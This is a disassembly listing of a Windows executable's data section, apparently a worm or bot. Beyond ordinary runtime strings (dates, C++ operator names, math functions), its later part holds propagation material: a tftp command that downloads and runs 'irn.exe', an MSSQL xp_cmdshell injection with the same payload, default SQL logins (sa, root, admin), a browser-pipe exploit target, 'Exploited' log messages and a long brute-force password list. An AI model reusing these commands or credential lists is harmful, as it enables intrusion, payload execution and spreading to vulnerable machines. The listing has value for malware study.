		dd 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h
		dd 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh
		dd 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h
		dd 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h
		dd 0FBFAF9F8h, 0FFFEFDFCh, 6D3A4848h, 73733A6Dh, 0
aDdddMmmmDdYyyy	db 'dddd, MMMM dd, yyyy',0 ; DATA XREF: .data:00423F1Co
aMmDdYy		db 'MM/dd/yy',0         ; DATA XREF: .data:00423F18o
		align 4
aPm		db 'PM',0               ; DATA XREF: .data:00423F14o
		align 4
aAm		db 'AM',0               ; DATA XREF: .data:00423F10o
		align 4
aDecember	db 'December',0         ; DATA XREF: .data:00423F0Co
		align 4
aNovember	db 'November',0         ; DATA XREF: .data:00423F08o
		align 4
aOctober	db 'October',0          ; DATA XREF: .data:00423F04o
aSeptember	db 'September',0        ; DATA XREF: .data:00423F00o
		align 4
aAugust		db 'August',0           ; DATA XREF: .data:00423EFCo
		align 10h
aJuly		db 'July',0             ; DATA XREF: .data:00423EF8o
		align 4
aJune		db 'June',0             ; DATA XREF: .data:00423EF4o
		align 10h
aApril		db 'April',0            ; DATA XREF: .data:00423EECo
		align 4
aMarch		db 'March',0            ; DATA XREF: .data:00423EE8o
		align 10h
aFebruary	db 'February',0         ; DATA XREF: .data:00423EE4o
		align 4
aJanuary	db 'January',0          ; DATA XREF: .data:00423EE0o
aDec		db 'Dec',0              ; DATA XREF: .data:00423EDCo
aNov		db 'Nov',0              ; DATA XREF: .data:00423ED8o
aOct		db 'Oct',0              ; DATA XREF: .data:00423ED4o
aSep		db 'Sep',0              ; DATA XREF: .data:00423ED0o
aAug		db 'Aug',0              ; DATA XREF: .data:00423ECCo
aJul		db 'Jul',0              ; DATA XREF: .data:00423EC8o
aJun		db 'Jun',0              ; DATA XREF: .data:00423EC4o
aMay		db 'May',0              ; DATA XREF: .data:00423EC0o
					; .data:00423EF0o
aApr		db 'Apr',0              ; DATA XREF: .data:00423EBCo
aMar		db 'Mar',0              ; DATA XREF: .data:00423EB8o
aFeb		db 'Feb',0              ; DATA XREF: .data:00423EB4o
aJan		db 'Jan',0              ; DATA XREF: .data:00423EB0o
aSaturday	db 'Saturday',0         ; DATA XREF: .data:00423EACo
		align 10h
aFriday		db 'Friday',0           ; DATA XREF: .data:00423EA8o
		align 4
aThursday	db 'Thursday',0         ; DATA XREF: .data:00423EA4o
		align 4
aWednesday	db 'Wednesday',0        ; DATA XREF: .data:00423EA0o
		align 10h
aTuesday	db 'Tuesday',0          ; DATA XREF: .data:00423E9Co
aMonday		db 'Monday',0           ; DATA XREF: .data:00423E98o
		align 10h
aSunday		db 'Sunday',0           ; DATA XREF: .data:00423E94o
		align 4
aSat		db 'Sat',0              ; DATA XREF: .data:00423E90o
aFri		db 'Fri',0              ; DATA XREF: .data:00423E8Co
aThu		db 'Thu',0              ; DATA XREF: .data:00423E88o
aWed		db 'Wed',0              ; DATA XREF: .data:00423E84o
aTue		db 'Tue',0              ; DATA XREF: .data:00423E80o
aMon		db 'Mon',0              ; DATA XREF: .data:00423E7Co
aSun		db 'Sun',0              ; DATA XREF: .data:off_423E78o
aInitializecrit	db 'InitializeCriticalSectionAndSpinCount',0 ; DATA XREF: sub_40CEC4+53o
		align 4
aKernel32_dl_10	db 'kernel32.dll',0     ; DATA XREF: sub_40CEC4+44o
		align 4
aCompleteObject	db ' Complete Object Locator',27h,0 ; DATA XREF: _1fieagrn:0041EB94o
		align 4
aClassHierarchy	db ' Class Hierarchy Descriptor',27h,0 ; DATA XREF: _1fieagrn:0041EB90o
		align 4
aBaseClassArray	db ' Base Class Array',27h,0 ; DATA XREF: _1fieagrn:0041EB8Co
		align 4
aBaseClassDescr	db ' Base Class Descriptor at (',0 ; DATA XREF: _1fieagrn:0041EB88o
aTypeDescriptor	db ' Type Descriptor',27h,0 ; DATA XREF: _1fieagrn:0041EB84o
		align 4
aLocalStaticThr	db '`local static thread guard',27h,0 ; DATA XREF: _1fieagrn:0041ECD0o
aManagedVectorC	db '`managed vector copy constructor iterator',27h,0
					; DATA XREF: _1fieagrn:0041ECCCo
		align 4
aVectorVbaseCop	db '`vector vbase copy constructor iterator',27h,0
					; DATA XREF: _1fieagrn:0041ECC8o
		align 10h
aVectorCopyCons	db '`vector copy constructor iterator',27h,0
					; DATA XREF: _1fieagrn:0041ECC4o
		align 4
aDynamicAtexitD	db '`dynamic atexit destructor for ',27h,0 ; DATA XREF: _1fieagrn:0041ECC0o
		align 4
aDynamicInitial	db '`dynamic initializer for ',27h,0 ; DATA XREF: _1fieagrn:0041ECBCo
		align 4
aEhVectorVbaseC	db '`eh vector vbase copy constructor iterator',27h,0
					; DATA XREF: _1fieagrn:0041ECB8o
aEhVectorCopyCo	db '`eh vector copy constructor iterator',27h,0
					; DATA XREF: _1fieagrn:0041ECB4o
		align 4
aManagedVectorD	db '`managed vector destructor iterator',27h,0
					; DATA XREF: _1fieagrn:0041ECB0o
		align 10h
aManagedVecto_0	db '`managed vector constructor iterator',27h,0
					; DATA XREF: _1fieagrn:0041ECACo
		align 4
aPlacementDelet	db '`placement delete[] closure',27h,0 ; DATA XREF: _1fieagrn:0041ECA8o
		align 4
aPlacementDel_0	db '`placement delete closure',27h,0 ; DATA XREF: _1fieagrn:0041ECA4o
		align 4
aOmniCallsig	db '`omni callsig',27h,0 ; DATA XREF: _1fieagrn:0041ECA0o
		align 4
aDelete		db ' delete[]',0        ; DATA XREF: _1fieagrn:0041EC9Co
		align 10h
aNew		db ' new[]',0           ; DATA XREF: _1fieagrn:0041EC98o
		align 4
aLocalVftableCo	db '`local vftable constructor closure',27h,0
					; DATA XREF: _1fieagrn:0041EC94o
aLocalVftable	db '`local vftable',27h,0 ; DATA XREF: _1fieagrn:0041EC90o
aRtti		db '`RTTI',0            ; DATA XREF: _1fieagrn:0041EC8Co
		align 4
off_41E854	dd offset dword_484560	; DATA XREF: _1fieagrn:0041EC88o
aUdtReturning	db '`udt returning',27h,0 ; DATA XREF: _1fieagrn:0041EC84o
aCopyConstructo	db '`copy constructor closure',27h,0 ; DATA XREF: _1fieagrn:0041EC80o
		align 4
aEhVectorVbas_0	db '`eh vector vbase constructor iterator',27h,0
					; DATA XREF: _1fieagrn:0041EC7Co
		align 4
aEhVectorDestru	db '`eh vector destructor iterator',27h,0 ; DATA XREF: _1fieagrn:0041EC78o
aEhVectorConstr	db '`eh vector constructor iterator',27h,0 ; DATA XREF: _1fieagrn:0041EC74o
		align 10h
aVirtualDisplac	db '`virtual displacement map',27h,0 ; DATA XREF: _1fieagrn:0041EC70o
		align 4
aVectorVbaseCon	db '`vector vbase constructor iterator',27h,0
					; DATA XREF: _1fieagrn:0041EC6Co
aVectorDestruct	db '`vector destructor iterator',27h,0 ; DATA XREF: _1fieagrn:0041EC68o
		align 10h
aVectorConstruc	db '`vector constructor iterator',27h,0 ; DATA XREF: _1fieagrn:0041EC64o
		align 10h
aScalarDeleting	db '`scalar deleting destructor',27h,0 ; DATA XREF: _1fieagrn:0041EC60o
		align 10h
aDefaultConstru	db '`default constructor closure',27h,0 ; DATA XREF: _1fieagrn:0041EC5Co
		align 10h
aVectorDeleting	db '`vector deleting destructor',27h,0 ; DATA XREF: _1fieagrn:0041EC58o
		align 10h
aVbaseDestructo	db '`vbase destructor',27h,0 ; DATA XREF: _1fieagrn:0041EC54o
		align 4
aString		db '`string',27h,0      ; DATA XREF: _1fieagrn:0041EC50o
		align 10h
aLocalStaticGua	db '`local static guard',27h,0 ; DATA XREF: _1fieagrn:0041EC4Co
		align 4
aTypeof		db '`typeof',27h,0      ; DATA XREF: _1fieagrn:0041EC48o
		align 4
aVcall		db '`vcall',27h,0       ; DATA XREF: _1fieagrn:0041EC44o
aVbtable	db '`vbtable',27h,0     ; DATA XREF: _1fieagrn:0041EC40o
		align 4
aVftable	db '`vftable',27h,0     ; DATA XREF: _1fieagrn:0041EC3Co
		align 4
asc_41EA34	db '^=',0               ; DATA XREF: _1fieagrn:0041EC38o
		align 4
asc_41EA38	db '|=',0               ; DATA XREF: _1fieagrn:0041EC34o
		align 4
asc_41EA3C	db '&=',0               ; DATA XREF: _1fieagrn:0041EC30o
		align 10h
asc_41EA40	db '<<=',0              ; DATA XREF: _1fieagrn:0041EC2Co
asc_41EA44	db '>>=',0              ; DATA XREF: _1fieagrn:0041EC28o
asc_41EA48	db '%=',0               ; DATA XREF: _1fieagrn:0041EC24o
		align 4
asc_41EA4C	db '/=',0               ; DATA XREF: _1fieagrn:0041EC20o
		align 10h
asc_41EA50	db '-=',0               ; DATA XREF: _1fieagrn:0041EC1Co
		align 4
asc_41EA54	db '+=',0               ; DATA XREF: _1fieagrn:0041EC18o
		align 4
asc_41EA58	db '*=',0               ; DATA XREF: _1fieagrn:0041EC14o
		align 4
asc_41EA5C	db '||',0               ; DATA XREF: _1fieagrn:0041EC10o
		align 10h
asc_41EA60	db '&&',0               ; DATA XREF: _1fieagrn:0041EC0Co
		align 4
asc_41EA64:				; DATA XREF: _1fieagrn:0041EC08o
		unicode	0, <|>,0
asc_41EA68:				; DATA XREF: _1fieagrn:0041EC04o
		unicode	0, <^>,0
asc_41EA6C:				; DATA XREF: _1fieagrn:0041EC00o
		unicode	0, <~>,0
asc_41EA70	db '()',0               ; DATA XREF: _1fieagrn:0041EBFCo
		align 4
asc_41EA74:				; DATA XREF: _1fieagrn:0041EBF8o
		unicode	0, <,>,0
asc_41EA78	db '>=',0               ; DATA XREF: _1fieagrn:0041EBF4o
		align 4
asc_41EA7C:				; DATA XREF: _1fieagrn:0041EBF0o
		dw 3Eh
		unicode	0, <>,0
asc_41EA80	db '<=',0               ; DATA XREF: _1fieagrn:0041EBECo
		align 4
asc_41EA84:				; DATA XREF: _1fieagrn:0041EBE8o
		dw 3Ch
		unicode	0, <>,0
asc_41EA88:				; DATA XREF: _1fieagrn:0041EBE4o
		unicode	0, <%>,0
asc_41EA8C:				; DATA XREF: _1fieagrn:0041EBE0o
		unicode	0, </>,0
asc_41EA90	db '->*',0              ; DATA XREF: _1fieagrn:0041EBDCo
asc_41EA94:				; DATA XREF: _1fieagrn:0041EBD8o
		unicode	0, <&>,0
asc_41EA98:				; DATA XREF: _1fieagrn:0041EBD4o
		unicode	0, <+>,0
asc_41EA9C:				; DATA XREF: _1fieagrn:0041EBD0o
		unicode	0, <->,0
asc_41EAA0	db '--',0               ; DATA XREF: _1fieagrn:0041EBCCo
		align 4
asc_41EAA4	db '++',0               ; DATA XREF: _1fieagrn:0041EBC8o
		align 4
asc_41EAA8:				; DATA XREF: _1fieagrn:0041EBC4o
		unicode	0, <*>,0
asc_41EAAC	db '->',0               ; DATA XREF: _1fieagrn:0041EBC0o
		align 10h
aOperator	db 'operator',0         ; DATA XREF: _1fieagrn:0041EBBCo
		align 4
asc_41EABC	db '[]',0               ; DATA XREF: _1fieagrn:0041EBB8o
		align 10h
asc_41EAC0	db '!=',0               ; DATA XREF: _1fieagrn:0041EBB4o
		align 4
asc_41EAC4	db '==',0               ; DATA XREF: _1fieagrn:off_41EBB0o
		align 4
asc_41EAC8:				; DATA XREF: _1fieagrn:0041EBACo
		unicode	0, <!>,0
		db '<<',0
		align 10h
		db '>>',0
		align 4
aDelete_0	db ' delete',0
aNew_0		db ' new',0             ; DATA XREF: _1fieagrn:0041EB98o
		align 4
a__unaligned	db '__unaligned',0      ; DATA XREF: _1fieagrn:0041EB7Co
a__restrict	db '__restrict',0       ; DATA XREF: _1fieagrn:0041EB78o
		align 4
; a__ptr64
a__ptr64	db '__ptr64',0          ; DATA XREF: _1fieagrn:0041EB74o
a__clrcall	db '__clrcall',0        ; DATA XREF: _1fieagrn:0041EB70o
		align 10h
a__fastcall	db '__fastcall',0
		align 4
a__thiscall	db '__thiscall',0
		align 4
a__stdcall	db '__stdcall',0
		align 4
a__pascal	db '__pascal',0         ; DATA XREF: _1fieagrn:0041EB60o
		align 10h
a__cdecl	db '__cdecl',0          ; DATA XREF: _1fieagrn:0041EB5Co
a__based	db '__based(',0
		align 8
		dec	eax
		jmp	short loc_41EB9C
; ---------------------------------------------------------------------------
		align 4
		dd offset a__cdecl	; "__cdecl"
		dd offset a__pascal	; "__pascal"
; ---------------------------------------------------------------------------
		sub	bl, ch
		inc	ecx
		add	[ebx+ebp*8], bl
		inc	ecx
		add	[eax], dl
		jmp	short near ptr off_41EBB0
; ---------------------------------------------------------------------------
		align 10h
		dd offset a__clrcall	; "__clrcall"
		dd offset a__ptr64	; "__ptr64"
		dd offset a__restrict	; "__restrict"
		dd offset a__unaligned	; "__unaligned"
		dd offset word_41D492
		dd offset aTypeDescriptor ; " Type Descriptor'"
		dd offset aBaseClassDescr ; " Base Class Descriptor at ("
		dd offset aBaseClassArray ; " Base Class Array'"
		dd offset aClassHierarchy ; " Class Hierarchy Descriptor'"
		dd offset aCompleteObject ; " Complete Object Locator'"
		dd offset aNew_0	; " new"
; ---------------------------------------------------------------------------

loc_41EB9C:				; CODE XREF: _1fieagrn:0041EB59j
		aam	0EAh
		inc	ecx
		add	[eax-2FFFBE2Ch], dl
		jmp	far ptr	41h:0EACC0041h
; ---------------------------------------------------------------------------
		dd offset asc_41EAC8	; "!"
off_41EBB0	dd offset asc_41EAC4	; CODE XREF: _1fieagrn:0041EB6Dj
					; "=="
		dd offset asc_41EAC0	; "!="
		dd offset asc_41EABC	; "[]"
		dd offset aOperator	; "operator"
		dd offset asc_41EAAC	; "->"
		dd offset asc_41EAA8	; "*"
		dd offset asc_41EAA4	; "++"
		dd offset asc_41EAA0	; "--"
		dd offset asc_41EA9C	; "-"
		dd offset asc_41EA98	; "+"
		dd offset asc_41EA94	; "&"
		dd offset asc_41EA90	; "->*"
		dd offset asc_41EA8C	; "/"
		dd offset asc_41EA88	; "%"
		dd offset asc_41EA84	; "<"
		dd offset asc_41EA80	; "<="
		dd offset asc_41EA7C	; ">"
		dd offset asc_41EA78	; ">="
		dd offset asc_41EA74	; ","
		dd offset asc_41EA70	; "()"
		dd offset asc_41EA6C	; "~"
		dd offset asc_41EA68	; "^"
		dd offset asc_41EA64	; "|"
		dd offset asc_41EA60	; "&&"
		dd offset asc_41EA5C	; "||"
		dd offset asc_41EA58	; "*="
		dd offset asc_41EA54	; "+="
		dd offset asc_41EA50	; "-="
		dd offset asc_41EA4C	; "/="
		dd offset asc_41EA48	; "%="
		dd offset asc_41EA44	; ">>="
		dd offset asc_41EA40	; "<<="
		dd offset asc_41EA3C	; "&="
		dd offset asc_41EA38	; "|="
		dd offset asc_41EA34	; "^="
		dd offset aVftable	; "`vftable'"
		dd offset aVbtable	; "`vbtable'"
		dd offset aVcall	; "`vcall'"
		dd offset aTypeof	; "`typeof'"
		dd offset aLocalStaticGua ; "`local static guard'"
		dd offset aString	; "`string'"
		dd offset aVbaseDestructo ; "`vbase destructor'"
		dd offset aVectorDeleting ; "`vector deleting destructor'"
		dd offset aDefaultConstru ; "`default constructor closure'"
		dd offset aScalarDeleting ; "`scalar deleting destructor'"
		dd offset aVectorConstruc ; "`vector constructor iterator'"
		dd offset aVectorDestruct ; "`vector destructor	iterator'"
		dd offset aVectorVbaseCon ; "`vector vbase constructor iterator'"
		dd offset aVirtualDisplac ; "`virtual displacement map'"
		dd offset aEhVectorConstr ; "`eh vector	constructor iterator'"
		dd offset aEhVectorDestru ; "`eh vector	destructor iterator'"
		dd offset aEhVectorVbas_0 ; "`eh vector	vbase constructor iterator'"
		dd offset aCopyConstructo ; "`copy constructor closure'"
		dd offset aUdtReturning	; "`udt	returning'"
		dd offset off_41E854
		dd offset aRtti		; "`RTTI"
		dd offset aLocalVftable	; "`local vftable'"
		dd offset aLocalVftableCo ; "`local vftable constructor	closure'"
		dd offset aNew		; " new[]"
		dd offset aDelete	; " delete[]"
		dd offset aOmniCallsig	; "`omni callsig'"
		dd offset aPlacementDel_0 ; "`placement	delete closure'"
		dd offset aPlacementDelet ; "`placement	delete[] closure'"
		dd offset aManagedVecto_0 ; "`managed vector constructor iterator'"
		dd offset aManagedVectorD ; "`managed vector destructor	iterator'"
		dd offset aEhVectorCopyCo ; "`eh vector	copy constructor iterator'"
		dd offset aEhVectorVbaseC ; "`eh vector	vbase copy constructor itera"...
		dd offset aDynamicInitial ; "`dynamic initializer for '"
		dd offset aDynamicAtexitD ; "`dynamic atexit destructor	for '"
		dd offset aVectorCopyCons ; "`vector copy constructor iterator'"
		dd offset aVectorVbaseCop ; "`vector vbase copy	constructor iterator"...
		dd offset aManagedVectorC ; "`managed vector copy constructor iterat"...
		dd offset aLocalStaticThr ; "`local static thread guard'"
		dd offset word_41D492
		dd 86808006h, 808180h, 86031000h, 80828680h, 45050514h
		dd 85854545h, 585h, 50803030h, 8008880h, 38272800h, 805750h
		dd 30370007h, 88505030h, 20000000h, 80888028h, 80h
aHHhhXppwpp	db '`h`hhh',8,8,7,'xppwpp',8,8,0
		dw 800h
		dd 7000800h, 8
aGetprocesswind	db 'GetProcessWindowStation',0 ; DATA XREF: sub_40F8D4+C1o
aGetuserobjecti	db 'GetUserObjectInformationA',0 ; DATA XREF: sub_40F8D4+A9o
		align 4
aGetlastactivep	db 'GetLastActivePopup',0 ; DATA XREF: sub_40F8D4+6Do
		align 4
aGetactivewindo	db 'GetActiveWindow',0  ; DATA XREF: sub_40F8D4+58o
aMessageboxa	db 'MessageBoxA',0      ; DATA XREF: sub_40F8D4+46o
aUser32_dll_0	db 'USER32.DLL',0       ; DATA XREF: sub_40F8D4+28o
		align 4
off_41EDA4	dd offset sub_40FB1C	; DATA XREF: sub_407D29r sub_407D29+9o ...
		dd offset nullsub_292
		dd offset nullsub_292
a_nextafter	db '_nextafter',0
		align 4
a_logb		db '_logb',0
		align 4
a_yn		db '_yn',0
a_y1		db '_y1',0
a_y0		db '_y0',0
aFrexp		db 'frexp',0
		align 4
aFmod		db 'fmod',0
		align 10h
a_hypot		db '_hypot',0
		align 4
a_cabs		db '_cabs',0
		align 10h
aLdexp		db 'ldexp',0
		align 4
aFabs		db 'fabs',0
		align 10h
aSqrt		db 'sqrt',0
		align 4
aAtan2		db 'atan2',0
		align 10h
aTanh		db 'tanh',0
		align 4
aCosh		db 'cosh',0
		align 10h
aSinh		db 'sinh',0
		align 4
dbl_41EE28	dq 0.0			; DATA XREF: sub_40FED1+143r
aSunmontuewedth	db 'SunMonTueWedThuFriSat',0
		align 4
aJanfebmaraprma	db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
		align 10h
aE000		db 'e+000',0            ; DATA XREF: sub_410E04:loc_410EDCo
		align 4
dbl_41EE78	dq 4.195835e6		; DATA XREF: sub_411744+Fr
dbl_41EE80	dq 3.145727e6		; DATA XREF: sub_411744+6r
aIsprocessorfea	db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_411780+Fo
		align 4
aKernel32	db 'KERNEL32',0         ; DATA XREF: sub_411780o
		align 10h
aConout		db 'CONOUT$',0          ; DATA XREF: sub_4117DB+Eo
a1Qnan		db '1#QNAN',0           ; DATA XREF: sub_412E61:loc_412F90o
		align 10h
a1Inf		db '1#INF',0            ; DATA XREF: sub_412E61+103o
		align 4
a1Ind		db '1#IND',0            ; DATA XREF: sub_412E61+F4o
		align 10h
a1Snan		db '1#SNAN',0           ; DATA XREF: sub_412E61+DCo
		align 4
aBadAllocation	db 'bad allocation',0   ; DATA XREF: .data:00424520o
		align 4
aScan_start	db 'scan.start',0       ; DATA XREF: .text:0041CC4Co
		align 4
aScan_stop	db 'scan.stop',0        ; DATA XREF: .text:0041CC68o
byte_41EEFE	db 0			; DATA XREF: sub_41AFA7+9Co
byte_41EEFF	db 0			; DATA XREF: sub_41AFA7+A8o
dword_41EF00	dd 6E616373h, 6174732Eh, 7374h ; DATA XREF: .text:0041CC84o
dword_41EF0C	dd 252E6425h, 64252E64h, 64252Eh ; DATA	XREF: sub_413DDD+4Ao
byte_41EF18	db 25h,	73h, 0		; DATA XREF: sub_413DDD+18Co
		db 0			; DATA XREF: .data:off_425830o
byte_41EF1C	db 25h,	73h, 0		; DATA XREF: sub_413DDD+29Co
byte_41EF1F	db 0			; DATA XREF: sub_41BED6+1DDo
dword_41EF20	dd 7325h		; DATA XREF: sub_413DDD+386o
byte_41EF24	db 25h,	73h, 0		; DATA XREF: sub_413DDD+495o
byte_41EF27	db 0			; DATA XREF: sub_41C28D:loc_41C735o
dword_41EF28	dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh ; DATA XREF: .data:00424524o
aTftpISGetIrn_e	db 'tftp -i %s GET irn.exe&start irn.exe&exit',0Dh,0Ah,0
					; DATA XREF: sub_41AB81+EFo
aBadAllocatio_0	db 'bad allocation',0   ; DATA XREF: .data:004245D8o
		align 4
aBadAllocatio_1	db 'bad allocation',0   ; DATA XREF: .data:004245DCo
		align 4
aWindowsNt42000	db 'Windows NT4, 2000 (SP0-SP4)',0
aWindowsXpSp0Sp	db 'Windows XP (SP0+SP1)',0 ; DATA XREF: .data:00425814o
		align 4
		dd offset dword_49005C
		dd offset dword_430050
		dd 24h,	5C005Ch, 3 dup(0)
		dd offset dword_49005C
		dd offset dword_430050
		dd 24h,	5C005Ch, 0
dword_41EFE8	dd 2Eh			; DATA XREF: sub_41AFA7+57o
dword_41EFEC	dd 73255C5Ch, 6370695Ch, 24h ; DATA XREF: sub_41AFA7+76o
aSPipeBrowser	db '\\%s\pipe\browser',0 ; DATA XREF: sub_41AFA7+CAo
		align 4
dword_41F00C	dd 4B324FC8h, 1D31670h,	475A7812h, 88E16EBFh, 0	; DATA XREF: sub_41AFA7+191o
dword_41F020	dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 3 dup(0)
					; DATA XREF: sub_41AFA7+1ACo
; ---------------------------------------------------------------------------
		jmp	short near ptr dword_41F040
; ---------------------------------------------------------------------------
		align 10h
dword_41F040	dd 0			; CODE XREF: _1fieagrn:0041F03Cj
aHttpSDS_0	db 'http://%s:%d/%s',0  ; DATA XREF: sub_41AFA7+3D3o
aHttpSDS_1	db 'http://%s:%d/%s',0  ; DATA XREF: sub_41AFA7+451o
aSExploitedS_	db '%s: Exploited: %s.',0 ; DATA XREF: sub_41AFA7+76Eo
		align 4
aBadAllocatio_2	db 'bad allocation',0   ; DATA XREF: .data:00425828o
		align 4
aSa		db 'sa',0               ; DATA XREF: sub_41B751+55o
		align 4
aRoot		db 'root',0             ; DATA XREF: sub_41B751+5Co
		align 4
aAdmin		db 'admin',0            ; DATA XREF: sub_41B751+63o
		align 4
aDriverSqlServe	db 'DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s',0
					; DATA XREF: sub_41B751+10Co
		align 10h
; aExecMaster(long long, *)
aExecMaster__xp	db 'EXEC master..xp_cmdshell ',27h,'tftp -i %s GET irn.exe&start irn.exe'
					; DATA XREF: sub_41B751+197o
		db '&exit',0Dh,0Ah
		db 27h,0
		align 4
aSExploitedS__0	db '%s: Exploited %s.',0 ; DATA XREF: sub_41B751+1F1o
		align 4
aAdministrator	db 'administrator',0    ; DATA XREF: .data:00425834o
		align 4
aAdministrador	db 'administrador',0    ; DATA XREF: .data:00425838o
		align 4
aAdministrateur	db 'administrateur',0   ; DATA XREF: .data:0042583Co
		align 4
aAdministrat	db 'administrat',0      ; DATA XREF: .data:00425840o
aAdmins		db 'admins',0           ; DATA XREF: .data:00425844o
		align 10h
aAdmin_0	db 'admin',0            ; DATA XREF: .data:00425848o
		align 4
aAdm		db 'adm',0              ; DATA XREF: .data:0042584Co
aPassword1	db 'password1',0        ; DATA XREF: .data:00425850o
		align 4
aPassword	db 'password',0         ; DATA XREF: .data:00425854o
		align 4
aPasswd		db 'passwd',0           ; DATA XREF: .data:00425858o
		align 4
aPass1234	db 'pass1234',0         ; DATA XREF: .data:0042585Co
		align 4
aPass		db 'pass',0             ; DATA XREF: .data:00425860o
		align 10h
aPwd		db 'pwd',0              ; DATA XREF: .data:00425864o
a007		db '007',0              ; DATA XREF: .data:00425868o
a1:					; DATA XREF: .data:0042586Co
		unicode	0, <1>,0
a12		db '12',0               ; DATA XREF: .data:00425870o
		align 10h
a123		db '123',0              ; DATA XREF: .data:00425874o
a1234		db '1234',0             ; DATA XREF: .data:00425878o
		align 4
a12345		db '12345',0            ; DATA XREF: .data:0042587Co
		align 4
a123456		db '123456',0           ; DATA XREF: .data:00425880o
		align 4
a1234567	db '1234567',0          ; DATA XREF: .data:00425884o
a12345678	db '12345678',0         ; DATA XREF: .data:00425888o
		align 10h
a123456789	db '123456789',0        ; DATA XREF: .data:0042588Co
		align 4
a1234567890	db '1234567890',0       ; DATA XREF: .data:00425890o
		align 4
a2000		db '2000',0             ; DATA XREF: .data:00425894o
		align 10h
a2001		db '2001',0             ; DATA XREF: .data:00425898o
		align 4
a2002		db '2002',0             ; DATA XREF: .data:0042589Co
		align 10h
a2003		db '2003',0             ; DATA XREF: .data:004258A0o
		align 4
a2004		db '2004',0             ; DATA XREF: .data:004258A4o
		align 10h
aTest		db 'test',0             ; DATA XREF: .data:004258A8o
		align 4
aGuest		db 'guest',0            ; DATA XREF: .data:004258ACo
		align 10h
aNone		db 'none',0             ; DATA XREF: .data:004258B0o
		align 4
aDemo		db 'demo',0             ; DATA XREF: .data:004258B4o
		align 10h
aUnix		db 'unix',0             ; DATA XREF: .data:004258B8o
		align 4
aLinux		db 'linux',0            ; DATA XREF: .data:004258BCo
		align 10h
aChangeme	db 'changeme',0         ; DATA XREF: .data:004258C0o
		align 4
aDefault	db 'default',0          ; DATA XREF: .data:004258C4o
aSystem_0	db 'system',0           ; DATA XREF: .data:004258C8o
		align 4
aServer		db 'server',0           ; DATA XREF: .data:004258CCo
		align 4
aRoot_0		db 'root',0             ; DATA XREF: .data:004258D0o
		align 4
aNull_1		db 'null',0             ; DATA XREF: .data:004258D4o
		align 4
aQwerty		db 'qwerty',0           ; DATA XREF: .data:004258D8o
		align 4
aMail		db 'mail',0             ; DATA XREF: .data:004258DCo
		align 4
aOutlook	db 'outlook',0          ; DATA XREF: .data:004258E0o
aWeb		db 'web',0              ; DATA XREF: .data:004258E4o
aWww		db 'www',0              ; DATA XREF: .data:004258E8o
aInternet	db 'internet',0         ; DATA XREF: .data:004258ECo
		align 10h
aAccounts	db 'accounts',0         ; DATA XREF: .data:004258F0o
		align 4
aAccounting	db 'accounting',0       ; DATA XREF: .data:004258F4o
		align 4
aHome		db 'home',0             ; DATA XREF: .data:004258F8o
		align 10h
aHomeuser	db 'homeuser',0         ; DATA XREF: .data:004258FCo
		align 4
aUser		db 'user',0             ; DATA XREF: .data:00425900o
		align 4
aOem		db 'oem',0              ; DATA XREF: .data:00425904o
aOemuser	db 'oemuser',0          ; DATA XREF: .data:00425908o
aOeminstall	db 'oeminstall',0       ; DATA XREF: .data:0042590Co
		align 4
aWindows	db 'windows',0          ; DATA XREF: .data:00425910o
aWin98		db 'win98',0            ; DATA XREF: .data:00425914o
		align 4
aWin2k		db 'win2k',0            ; DATA XREF: .data:00425918o
		align 4
aWinxp		db 'winxp',0            ; DATA XREF: .data:0042591Co
		align 4
aWinnt		db 'winnt',0            ; DATA XREF: .data:00425920o
		align 4
aWin2000	db 'win2000',0          ; DATA XREF: .data:00425924o
aQaz		db 'qaz',0              ; DATA XREF: .data:00425928o
aAsd		db 'asd',0              ; DATA XREF: .data:0042592Co
aZxc		db 'zxc',0              ; DATA XREF: .data:00425930o
aQwe		db 'qwe',0              ; DATA XREF: .data:00425934o
aBob		db 'bob',0              ; DATA XREF: .data:00425938o
aJen		db 'jen',0              ; DATA XREF: .data:0042593Co
aJoe		db 'joe',0              ; DATA XREF: .data:00425940o
aFred		db 'fred',0             ; DATA XREF: .data:00425944o
		align 10h
aBill		db 'bill',0             ; DATA XREF: .data:00425948o
		align 4
aMike		db 'mike',0             ; DATA XREF: .data:0042594Co
		align 10h
aJohn		db 'john',0             ; DATA XREF: .data:00425950o
		align 4
aPeter		db 'peter',0            ; DATA XREF: .data:00425954o
		align 10h
aLuke		db 'luke',0             ; DATA XREF: .data:00425958o
		align 4
aSam		db 'sam',0              ; DATA XREF: .data:0042595Co
aSue		db 'sue',0              ; DATA XREF: .data:00425960o
aSusan		db 'susan',0            ; DATA XREF: .data:00425964o
		align 4
aPeter_0	db 'peter',0            ; DATA XREF: .data:00425968o
		align 10h
aBrian		db 'brian',0            ; DATA XREF: .data:0042596Co
		align 4
aLee		db 'lee',0              ; DATA XREF: .data:00425970o
aNeil		db 'neil',0             ; DATA XREF: .data:00425974o
		align 4
aIan		db 'ian',0              ; DATA XREF: .data:00425978o
aChris		db 'chris',0            ; DATA XREF: .data:0042597Co
		align 10h
aEric		db 'eric',0             ; DATA XREF: .data:00425980o
		align 4
aGeorge		db 'george',0           ; DATA XREF: .data:00425984o
		align 10h
aKate		db 'kate',0             ; DATA XREF: .data:00425988o
		align 4
aBob_0		db 'bob',0              ; DATA XREF: .data:0042598Co
aKatie		db 'katie',0            ; DATA XREF: .data:00425990o
		align 4
aMary		db 'mary',0             ; DATA XREF: .data:00425994o
		align 4
aLogin		db 'login',0            ; DATA XREF: .data:00425998o
		align 4
aLoginpass	db 'loginpass',0        ; DATA XREF: .data:0042599Co
		align 10h
aTechnical	db 'technical',0        ; DATA XREF: .data:004259A0o
		align 4
aBackup		db 'backup',0           ; DATA XREF: .data:004259A4o
		align 4
aExchange	db 'exchange',0         ; DATA XREF: .data:004259A8o
		align 10h
aFuck		db 'fuck',0             ; DATA XREF: .data:004259ACo
		align 4
